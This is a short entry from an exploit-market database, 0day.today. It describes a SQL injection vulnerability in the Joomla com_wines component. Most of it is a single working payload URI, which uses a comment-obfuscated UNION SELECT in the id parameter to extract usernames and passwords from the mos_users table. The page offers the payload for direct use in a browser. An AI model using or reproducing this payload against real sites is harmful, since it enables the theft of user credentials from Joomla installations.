[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Joomla Component com_wines SQL Injection Vulnerability

Author
S@BUN
Risk
[
Security Risk High
]
0day-ID
0day-ID-20429
Category
web applications
Date add
31-01-2008
Platform
php
Attackers can use a browser to exploit this issue.

The following example URI is available:

http://www.example.com/index.php?option=com_wines&Itemid=[id]&func=detail&id=-000/**/union+select/**/0,0,password,null,null,null,null,null,0,0,0,0,0,0,1,1,1,0,0,0,0,0,username+from%2F%2A%2A%2Fmos_users/*

#  0day.today [2024-11-16]  #